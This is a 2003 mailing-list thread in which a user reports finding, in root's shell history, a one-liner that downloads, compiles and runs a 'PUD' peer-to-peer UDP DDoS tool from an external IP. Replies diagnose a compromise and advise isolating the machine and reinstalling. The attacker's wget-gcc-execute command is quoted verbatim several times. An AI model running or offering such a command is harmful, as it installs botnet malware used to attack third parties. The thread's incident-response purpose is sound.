Gideon, I checked .bash_history as you suggested and found and interesting entry. This entry was in .bash_history in the 'root' directory. cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit; I'm new at this but based on a little research am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it. Is this correct? I looked at the source for 'screen.c' and in the title it says... Peer-to-peer UDP Distributed Denial of Service (PUD) by contem Does look good does it? Is anyone familiar with this?
On Thu, 2003-04-24 at 15:45, Matt Stamm wrote:
Gideon,
I checked .bash_history as you suggested and found and interesting entry. This entry was in .bash_history in the 'root' directory.
cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
I'm new at this but based on a little research am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it. Is this correct? I looked at the source for 'screen.c' and in the title it says...
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem
Does look good does it? Is anyone familiar with this?
The IP points to "dailygrind.pciwest.net"
On Apr 24 at 12:45pm, Matt Stamm wrote: [...]
I checked .bash_history as you suggested and found and interesting entry. This entry was in .bash_history in the 'root' directory.
cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
I'm new at this but based on a little research am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it. Is this correct? I looked at the source for 'screen.c' and in the title it says...
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem [...]
Matt, It appears you're still investigating what happened to your system, and that's fine, but.... I know you've gotten advice from a number of people to the effect that if _part_ of your system has been compromised, then the _whole_ system is suspect, and the only reasonable action is a complete reinstall. It's very good advice. Go ahead and gather all the evidence you want, but save yourself some trouble and future uncertainty and reinstall. Don't try to patch the problem--you'll never know if you got everything. Jim
The 03.04.24 at 12:45, Matt Stamm wrote:
I checked .bash_history as you suggested and found and interesting entry. This entry was in .bash_history in the 'root' directory.
As somebody else has told you, discontinue using that PC! At least, if you want to investigate it, disconnect it from any network whatsoever. If you want proofs, remove the HD, or dump the contents to a CD or whatever using some external OS, like a rescue system on CD. DON'T use that machine as it is! Reformat, and reinstall everything. You can only reuse data files, after inspection. And do it now, please! :-|
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem
Ugh. :-(
Does look good does it? Is anyone familiar with this?
It has been commented somewhere, that or a similar one. Apparently, your machine is/was used to attack others, IMO. -- Cheers, Carlos Robinson
participants (4)
-
Carlos E. R.
-
Jim Cunning
-
Ken Schneider
-
Matt Stamm